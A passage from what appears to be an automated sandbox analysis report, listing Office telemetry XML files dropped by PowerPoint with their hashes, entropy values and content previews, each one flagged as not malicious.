                                                                                                                              Entropy (8bit):4.866322685671609
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dsWMvj8xqrW2r9mFrcrvvg9Jcmr79mu/37:csdj7y25uwTvg9Gdu/37
                                                                                                                              MD5:381C66EF71FC04C0FDEF8D09B75367F7
                                                                                                                              SHA1:9B9862F09006A391E92BFE528C628E7EF00145F5
                                                                                                                              SHA-256:48727DD73FB647296FFAE2E95D74BFE9415B861533D28383BB5DA7C17E60E47D
                                                                                                                              SHA-512:3760DDDE52EE395CC9BB690FCE7BFA9C9770E93AAF63A94295CFE2BF390A11E82CA25A4FDC4290609FDA1F31CEDD70028163F6C60018C72DB4E0AF25F1C4A3B3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224075" V="1" DC="SM" EN="Office.Licensing.OfficeClientLicensing.GetGenuineTicketFailure" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" DCa="PSU" xmlns="">.. <S>.. <R T="1" R="224072" />.. <R T="2" R="224073" />.. <R T="3" R="224074" />.. <UTS T="4" Id="bnpxq" />.. <UTS T="5" Id="a7opz" />.. <UTS T="6" Id="a7oql" />.. <UTS T="7" Id="a7oqj" />.. <F T="8">.. <O T="EQ">.. <L>.. <S T="7" F="Destination" />.. </L>.. <R>.. <V V="16" T="U32" />.. </R>.. </O>.. </F>.. </S>.. <C T="I64" I="0" O="true" N="GetGenuineTicketResult">.. <S T="4" F="HRESULT" />.. </C>.. <C T="B" I="1" O="true" N="RetryButtonClicked">.. <S T="2" F="0" />.. </C>.. <C T="B" I="2" O="true" N="ContinueButtonClicked">.. <S T="3" F="0" />.. </C>.. <C T="TAG" I="3" O="true" N="BindingMissing">.. <S T="6" F="ULS_Tag" M="Ignore" />.. </C>.. <C
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):504
                                                                                                                              Entropy (8bit):5.200872545078664
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd/CFKp5Mtlj87ersAXXMSM3O9YPEmyNO2su:2dG2Mvj8irsAXXOLMmi
                                                                                                                              MD5:14EA0A76EF1108E1F357549AAA2F6FA3
                                                                                                                              SHA1:38D83E36D518CDA20FB7DDD7B3D3080A83E6CFD9
                                                                                                                              SHA-256:D223E391B461993581D221EC150739D31CB061A0C762697C04677972FE967904
                                                                                                                              SHA-512:3B4079DF4EB918C5627F07A938519E0F151591ADEF40184CC356AA3907F97DCB40383E42B5B3E15FCAC2275AF15CC185DC488BA6114AFB9F5415C04B6086BB2B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224082" V="0" DC="SM" EN="Office.Licensing.OfficeClientLicensing.Session.ReportLicenseMessage" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a2zcw" />.. </S>.. <C T="I64" I="0" O="false" N="PopulateLicenseError">.. <S T="1" F="MessageIDS" />.. </C>.. <C T="I64" I="1" O="false" N="ResultCode">.. <S T="1" F="Error" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):829
                                                                                                                              Entropy (8bit):5.066160040947317
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdcCvr95Mtlj87erDer8erWBjEaSrYS69czvXa/9+UNe+NO5A3XGHNUlu:2drr7Mvj8irqrjrUFSrYlvi7
                                                                                                                              MD5:3C6ED9D0FA22F0ED88E4AA7910B76CB9
                                                                                                                              SHA1:EBD150A480824DF6EC8124F23C93933D00C42354
                                                                                                                              SHA-256:4B969BFF4C80F008ADED9DC6FCFD11112E27568BA16E0588C98C6F682FD4B100
                                                                                                                              SHA-512:8E7B79101EF49F826CDF8850F69BA1FDEB57BBBB4959A4F80B4C4FCDAF5EEFA0DBF89E6C543FA3DE19D4E9864EF266C94A4FBD9F869CE76FFA68EC536E252897
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224083" V="0" DC="SM" EN="Office.Licensing.OfficeClientLicensing.InAppAFOPinValidationResult" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bnpw6" />.. <UTS T="2" Id="bnpw8" />.. <UTS T="3" Id="bnpw9" />.. <A T="4" E="TelemetrySuspend" />.. <A T="5" E="TelemetryShutdown" />.. </S>.. <C T="I64" I="0" O="false" N="PinValidationResult">.. <S T="1" F="PinResult" />.. </C>.. <C T="TAG" I="1" O="true" N="DisableAFO">.. <S T="2" F="ULS_Tag" M="Ignore" />.. </C>.. <C T="TAG" I="2" O="true" N="SkipAFOOnce">.. <S T="3" F="ULS_Tag" M="Ignore" />.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. <S T="4" />.. <S T="5" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):812
                                                                                                                              Entropy (8bit):5.017010499705265
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdpCD5Mtlj87erDerXndYS69ezZdyJHCdh30N1Dglfn9xNO/HNUlu:2dwMvj8irqrNYlkzYyha1clv9S7
                                                                                                                              MD5:4E18E98FADFAC4D1A440D7F81070C24D
                                                                                                                              SHA1:FC1B2DC94A167E5A4E2CD3D40525F9FC65B316F2
                                                                                                                              SHA-256:8B9E08CFE21DB699A5A12A8F281C7F51F613486D35B0C15B0367BE0774EAE6F4
                                                                                                                              SHA-512:53DA7B04B97B7245ADB55E1EC5A200258C6A66EEF733A7930755CA648FB32271429C47682C89DC6F1800822D98639003FDE3693B0186BD32751DD9B2E54CABB2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224084" V="0" DC="SM" EN="Office.Licensing.OfficeClientLicensing.InAppAFOSuccess" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bnpw6" />.. <UTS T="2" Id="bc9mt" />.. </S>.. <C T="I64" I="0" O="false" N="RedemptionResult">.. <S T="1" F="PinResult" />.. </C>.. <C T="I32" I="1" O="false" N="IsSuccess">.. <S T="2" F="ResultCode" />.. </C>.. <C T="W" I="2" O="false" N="StatusCode">.. <S T="2" F="StatusCode" />.. </C>.. <C T="W" I="3" O="false" N="StatusMessage">.. <S T="2" F="StatusMessage" />.. </C>.. <C T="U32" I="4" O="false" N="ErrorType">.. <S T="2" F="ErrorType" />.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2463
                                                                                                                              Entropy (8bit):4.341998590848822
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dMMvj8trsrerKbigJujQauvjfsjw8lQaGDfUGve6rF16ntF7:cPjaoC+GgJujQvvTsk8lQTD76ntF7
                                                                                                                              MD5:E02DB2CBE22EE006046CCE6CDFA4CC88
                                                                                                                              SHA1:BEF3C35984CB4BEA111A45207BA0CF1770151ED0
                                                                                                                              SHA-256:BBB9F96E1EA13E9EE79119C4DFB3892DA617239635F750235A3B1F2F2FD6FD57
                                                                                                                              SHA-512:2A8DE215D94547D3140C553B5D7DEE3F44FE1CAC014D48D72C8BC97670A1BEF3B1F74AA2221758600C9DB2F326ECD5214C39E81C6FC5ACCC3B4BB458A6513E40
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224085" V="0" DC="SM" EN="Office.Licensing.PreExpirationBusBarInteraction" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" S="1" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a4673" />.. <UTS T="2" Id="a468a" />.. <UTS T="3" Id="a5ri8" />.. <TI T="4" I="30min" />.. <A T="5" E="TelemetrySuspend" />.. <A T="6" E="TelemetryShutdown" />.. <F T="7">.. <O T="EQ">.. <L>.. <S T="1" F="PartType" />.. </L>.. <R>.. <V V="40" T="I32" />.. </R>.. </O>.. </F>.. <F T="8">.. <O T="EQ">.. <L>.. <S T="2" F="ButtonAction" />.. </L>.. <R>.. <V V="Buy" T="W" />.. </R>.. </O>.. </F>.. <F T="9">.. <O T="EQ">.. <L>.. <S T="2" F="ButtonAction" />.. </L>.. <R>.. <V V="Remind Me Later" T="W" />.. </R>.. </O>.. </F>.. <F T="10">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1921
                                                                                                                              Entropy (8bit):4.414808067265105
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dAMvj8trsrerKbigJujQaevjOslQa2FUGI1q1tF7:cDjaoC+GgJujQjvislQK1+tF7
                                                                                                                              MD5:3C40953A1DBA50ED8FAF04EE350006B5
                                                                                                                              SHA1:D55AF128665BB6C09CEFB37B30C532C6AC44A105
                                                                                                                              SHA-256:BAEEFB1C6300C9FA281DB65CCAE479D8168338C9CC11F6DDC3CEFEA4DF4A6B06
                                                                                                                              SHA-512:0759E489A5D12BBB0EAD4FB5051F82C55C02CCE75DDE973FBC004A392B5DA4C7F1570F763A544A13C61AF5F2E0801664F2222E7A30F2E2489257653CF9485694
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224086" V="0" DC="SM" EN="Office.Licensing.PostExpirationBusBarInteraction" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" S="1" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a4673" />.. <UTS T="2" Id="a468a" />.. <UTS T="3" Id="a5ri8" />.. <TI T="4" I="30min" />.. <A T="5" E="TelemetrySuspend" />.. <A T="6" E="TelemetryShutdown" />.. <F T="7">.. <O T="EQ">.. <L>.. <S T="1" F="PartType" />.. </L>.. <R>.. <V V="35" T="I32" />.. </R>.. </O>.. </F>.. <F T="8">.. <O T="EQ">.. <L>.. <S T="2" F="ButtonAction" />.. </L>.. <R>.. <V V="&amp;Reactivate" T="W" />.. </R>.. </O>.. </F>.. <F T="9">.. <O T="EQ">.. <L>.. <S T="3" F="PartType" />.. </L>.. <R>.. <V V="35" T="I32" />.. </R>.. </O>.. </F>.. </S>.. <C T="U32"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1404
                                                                                                                              Entropy (8bit):4.403513241689896
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd35Mtlj8HAQ4Wner5erXN+tNlOJeMfH/M//aO5eNX/c//JeaOH/M//x5eNpOk:2dJMvj8OrkrMt4fzrjPTKEMjwtVj7
                                                                                                                              MD5:87360B49636F0DCCC60717EDB08D8813
                                                                                                                              SHA1:B89E5F079A09FD9870E7EAC3FFB5EF97D95470C5
                                                                                                                              SHA-256:E62BD682384470EE4F0C457BC2504A14ABCA4C12C5558541C1E04C8D468713D1
                                                                                                                              SHA-512:770E75FF16F542BFE8C815EC9673E2DE608F916DCFF9E361B8803AD8B8016508BC40EE7FF7EF538947A582FE4E9237475639F92064892153C0F16C9BDE367AE8
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224087" V="1" DC="SM" EN="Office.Licensing.ExpirationDialogTiming" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bbxmb" />.. <UTS T="2" Id="bbxmc" />.. <F T="3">.. <O T="AND">.. <L>.. <O T="LE">.. <L>.. <V V="5" T="I32" />.. </L>.. <R>.. <S T="2" F="EventId" />.. </R>.. </O>.. </L>.. <R>.. <O T="LE">.. <L>.. <S T="2" F="EventId" />.. </L>.. <R>.. <V V="22" T="I32" />.. </R>.. </O>.. </R>.. </O>.. </F>.. </S>.. <C T="FT" I="0" O="true" N="ActionTime">.. <S T="3" F="TimeStamp100ns" />.. </C>.. <C T="U32" I="1" O="true" N="DialogAction">.. <S T="3" F="EventId" />.. </C>.. <C T="I32" I="2" O="true" N=
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):442
                                                                                                                              Entropy (8bit):4.387335043604801
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdu4berA+u/qNOCER+X/c//RpONaDjERBNOjsu:2dGr/uyiK5I
                                                                                                                              MD5:531B8F0D4153E8339D1FFE5E35834F6B
                                                                                                                              SHA1:65D8DB20D000A1BE78D850E8E59BE4264CCECFCA
                                                                                                                              SHA-256:AAA0D8F7338DF419C6475B17E34BB403CF43D10CE07DD3FF5FE0AF245D6953FA
                                                                                                                              SHA-512:C713E05F6CD19FFA552F8B15A20F98BF10AE558C5D862279610938E00C23004415F2A8996FD00E1696F7DF09CF102E7D04B9393678F2028DB01B4B07B79BC155
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224900" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <UTS T="1" Id="bbr5m" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="DoLicValidationMode" />.. </L>.. <R>.. <V V="0" T="I32" />.. </R>.. </O>.. </F>.. </S>.. <C T="I32" I="0" O="false">.. <S T="2" F="DoLicValidationMode" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2283
                                                                                                                              Entropy (8bit):4.823043803033768
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dn28R9MMvj8FvlX4nWrZWra87rRKVopwH2ca1Q1qCwJrJdfZSruGNh3rHK0S:cn2A9PjCMWtWv79KVerc2cqCrfPrLS
                                                                                                                              MD5:90469D1824E410C6BEF384B218D9F15E
                                                                                                                              SHA1:904B3DA4AAA4808330B5BBFB67D9AE981225BBB8
                                                                                                                              SHA-256:1C7AE9C9FF9A520669A8EA458978FE14E71A09425038486E168F4707C5858CFD
                                                                                                                              SHA-512:207FF7537FFC93A7824F4D8545B34457E1275AE086BA95FEAEDA1BA6A557A8A2631D1D42B71FBE6360764CBA12BFC18A60F950C551056168189C79CF834D83E3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium" DL="A" DCa="PSU" xmlns="">.. <RIS>.. <RI N="Metadata" />.. </RIS>.. <S>.. <R T="1" R="224900" />.. <R T="2" R="224902" />.. <UTS T="3" Id="be7wx" />.. <UTS T="4" Id="be7wy" />.. <SS T="5" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" />.. <F T="6">.. <O T="NE">.. <L>.. <S T="2" F="0" M="Ignore" />.. </L>.. <R>.. <V V="{99999999-9999-9999-9999-999999999999}" T="G" />.. </R>.. </O>.. </F>.. <F T="7">.. <O T="NE">.. <L>.. <S T="2" F="1" M="Ignore" />.. </L>.. <R>.. <V V="99999-999-999999" T="W" />.. </R>.. </O>.. </F>.. </S>.. <C T="I32" I="0" O="true" N="FullValidationMode">.. <S T="1" F="0" M="
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):449
                                                                                                                              Entropy (8bit):4.885360338479295
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd11bi0eferrNu87rRKfwSK6dXSGyINOSjsu:2d1XeWrro87rRKsqb
                                                                                                                              MD5:5C9BEFCB331203989683B51BF460F006
                                                                                                                              SHA1:359845C58E57BE3BAE70AC8C4E33AD547A643EA8
                                                                                                                              SHA-256:F6303095F28BF6FAED52F9761F65E4EA60719B599C2453EB39B5C4F431084B38
                                                                                                                              SHA-512:1F164F6D61D1C14D313B355B49C0FED9C344F5E4FAEFF12D9B18E4CC5415B8044665BDB787101442075489CDEF151A15683A2F27CBF30A5729AEF114BCCC1B6C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224902" V="2" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120100" />.. <UTS T="2" Id="bbr5q" />.. <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" />.. </S>.. <C T="G" I="0" O="falseNoError">.. <S T="3" F="Acid" M="Ignore" />.. </C>.. <C T="W" I="1" O="falseNoError">.. <S T="3" F="MachineKey" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3212
                                                                                                                              Entropy (8bit):3.8608030462994796
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dsTuJlB/98Klx0k9cqlhRpTKlR1ZR+mjlR1ZhPcpsJpDYpZ11uMTX0oG:cYuJD1fzx9/jXmTcaT6Mf
                                                                                                                              MD5:0F69C9C3037DEE0C63F986D712E6C2AB
                                                                                                                              SHA1:7AEE16E2F6DDDC28D0201CC55F659922EADB220F
                                                                                                                              SHA-256:2629B5966BCE533E681A0EF7CAF25989CA4A693A2E7D555385073A223B15C408
                                                                                                                              SHA-512:E1195E92E92FE49FDCA5002C5F7B28BC9D8ABA8F618494450719327A5DEC7A2D7114E57EF4898595FDEE3B670ABE03C2FAE18D32C8A0F5036CD259FC91440A1D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224903" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <UCSS T="1" C="Scope Summary" S="Medium" />.. <F T="2">.. <O T="OR">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="ScopeName" />.. </L>.. <R>.. <V V="Microsoft.Office.Licensing.Activation" T="W" />.. </R>.. </O>.. </L>.. <R>.. <O T="OR">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="ScopeName" />.. </L>.. <R>.. <V V="Microsoft.Office.Licensing.FullValidation" T="W" />.. </R>.. </O>.. </L>.. <R>.. <O T="OR">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="ScopeName" />.. </L>.. <R>.. <V V="Mic
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):4566
                                                                                                                              Entropy (8bit):3.983842431164816
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:csT3jnuJDh7z25joT8Tht/Diz9z6s0js0E0JIJUDO:pTTnu9h/IAshNKp65NRaGDO
                                                                                                                              MD5:2BB5ACAB25F2225A1BF05AB37125C2D2
                                                                                                                              SHA1:3422D48B9AE5264EB46DC09C2A8DC8AF462EEAE9
                                                                                                                              SHA-256:6EB504D9A0AC268F949B0D08ED8492B251E2D32768B51880BFAF1DAE5DCEF068
                                                                                                                              SHA-512:2444872EE848823C807DBB77F7A2E097589CCC1835B8C4297D2ABE196E6032EEB99B83146C64CE749D6DE59B43F1515327BD1CF53CD23ADAF218A2ABF8E3A690
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224906" V="1" DC="SM" EN="Office.Licensing.OfficeClientLicensing.CriticalLegacyActivitiesUnsampled" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UCSS T="1" C="Scope Summary" S="Medium" />.. <F T="2">.. <O T="OR">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="ScopeName" />.. </L>.. <R>.. <V V="Microsoft.Office.Licensing.OOBE.Activate" T="W" />.. </R>.. </O>.. </L>.. <R>.. <O T="OR">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="ScopeName" />.. </L>.. <R>.. <V V="Microsoft.Office.Licensing.OOBE.AFO" T="W" />.. </R>.. </O>.. </L>.. <R>.. <O T="OR">.. <L>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):442
                                                                                                                              Entropy (8bit):5.277290268081167
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBdwMkB45MqaIajECCORMFpAQ/yWnerhUNlrzVlrqyiMH/XyiwxNOn2sby:TMHdX5Mtlj8HAQqWnerOzUMfbwxNO2su
                                                                                                                              MD5:FF222B05A3237FD966B26CE02A8EFC01
                                                                                                                              SHA1:809CDCC8DA0749BC0375B08AE9D012DF326EDBDF
                                                                                                                              SHA-256:B1ECDB6DCD6441BD85B0C2DB4435304AC68612FCC5DF4FF63646673631A5F6D9
                                                                                                                              SHA-512:AC0E7C1FD7D28E56CD87451B0C602E0C7955C020352FD51DAE8277C535B56AD039B27F6FD66182D10010DD5FBD6F86A515BAC387BFEE089343487D7F23B41C2F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224910" V="1" DC="SM" EN="Office.Licensing.ExpirationDialogShown" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalBusinessImpact" DL="A" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bbxmb" />.. </S>.. <C T="I32" I="0" O="true" N="LicNotificationState">.. <S T="1" F="LicNotificationState" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1123
                                                                                                                              Entropy (8bit):4.870041544620127
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd94NgZQQUWCgerTcDQiBjEPQ3D0VSmiXl1lVZmwcSj9tpb/rtdVGw/d+xGC7T:2d2fQ1irloKqPiEJbB+co
                                                                                                                              MD5:D5F96FBCBFADFA8C5760146B15A1183A
                                                                                                                              SHA1:41854F958A608A2456BFE7DA791DC530B8F23528
                                                                                                                              SHA-256:33E851543EA41820F4E8808831C968E35724A6859E84C4A81B737D64E3C90177
                                                                                                                              SHA-512:60B5239F86FB414063B1C619B5FBA2B6726A6483C4185EE735424B76B64E04250EDAE7E7C18C32DEAB1CCD98DE8F3CCB02DE29EE446F037215808102C69FA517
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="226000" V="0" DC="SM" EN="Office.Globalization.OLEOGetHculture" ATT="fa2d8726ec914a019f61aa83d1a0f156-ff2e4b12-d084-4558-9515-fbf9e1224e49-7217" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a52i0" />.. <TI T="2" I="Hourly" />.. <A T="3" E="TelemetryShutdown" />.. <A T="4" E="TelemetrySuspend" />.. <TR T="5" />.. </S>.. <G>.. <S T="1">.. <F N="HResult" />.. <F N="ResultOrigin" />.. <F N="wzTag" />.. <F N="wzAliasTag" />.. </S>.. </G>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="5" F="TimeStamp100ns" />.. </C>.. <C T="I32" I="1" O="false" N="HResult">.. <S T="1" F="HResult" />.. </C>.. <C T="I32" I="2" O="false" N="ResultOrigin">.. <S T="1" F="ResultOrigin" />.. </C>.. <C T="W" I="3" O="true" N="CultureTag">.. <S T="1" F="wzTag" />.. </C>.. <C T="W" I="4" O="true" N="CultureAliasTag">.. <S T="1" F="wzAliasTag" />.. </C>.. <C T="U32" I="5" O="false" N="CultureCoun
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):484
                                                                                                                              Entropy (8bit):5.147263789391309
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBdNvEk2c4n0zJDxS9QUQHLuzOHperhVJrzVlrre/OVyndtqsVlrZ/MPNOn2su:TMHdlp40z7QQUWCger5zmTdLV6NO2su
                                                                                                                              MD5:97CC37FCD83D4BF5459AF276EEE99837
                                                                                                                              SHA1:DF01E5EA9EC968D460B67EE0E08F14376669B0C3
                                                                                                                              SHA-256:827E2485D2BFF65C8BDDEAE40915F500D4903C81B810C09CE140FB92D5230C7B
                                                                                                                              SHA-512:E5244EEBB104F0E2F7E98BF8D744D42A3E33BEE81ED7C0A1D538CE1446219ADB77D48853E86E658A1A9779403D6B0DA10D6FF3526A5C6417CD6F3C05B2565E16
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="226003" V="1" DC="SM" EN="Office.Globalization.PluggableUILanguageList" ATT="fa2d8726ec914a019f61aa83d1a0f156-ff2e4b12-d084-4558-9515-fbf9e1224e49-7217" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a2003" />.. </S>.. <C T="U32" I="0" O="true" N="OrderOfLanguage">.. <S T="1" F="OrderOfLanguage" />.. </C>.. <C T="W" I="1" O="true" N="LanguageTag">.. <S T="1" F="LanguageTag" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):525
                                                                                                                              Entropy (8bit):5.033843064015127
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdfy4hQQUWCger9MgZTNoCydy9yDNO2su:2dEQ1irri9
                                                                                                                              MD5:8870B0E60F540C2A508980F503D6EB80
                                                                                                                              SHA1:96A21ECB789F465EB4598FC1324C2E16A7A52880
                                                                                                                              SHA-256:DE15008469EAE48E13E4FA64E97D6C3F67961DD686A0C9FA799F9BD127929FDC
                                                                                                                              SHA-512:AB4B101D6DAB782DFAB57E7739F12A805A36C5D303D37D0C3B9B52FAA9A222DE7EE54F5E4E5704993F263086EF95931568142AD5EF28E1E74395E6472DBB492B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="226009" V="0" DC="SM" EN="Office.Globalization.StringResources" ATT="fa2d8726ec914a019f61aa83d1a0f156-ff2e4b12-d084-4558-9515-fbf9e1224e49-7217" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="b56v5" />.. </S>.. <C T="U32" I="0" O="false" N="Alias">.. <S T="1" F="alias" />.. </C>.. <C T="U32" I="1" O="false" N="Ids">.. <S T="1" F="ids" />.. </C>.. <C T="W" I="2" O="true" N="Container">.. <S T="1" F="container" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):577
                                                                                                                              Entropy (8bit):4.841183079259023
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdRaK1VNneryYerTAOerw2erx1/ivXahIfs6fBNOXasu:2dRakNery/rTmrwJrxGf
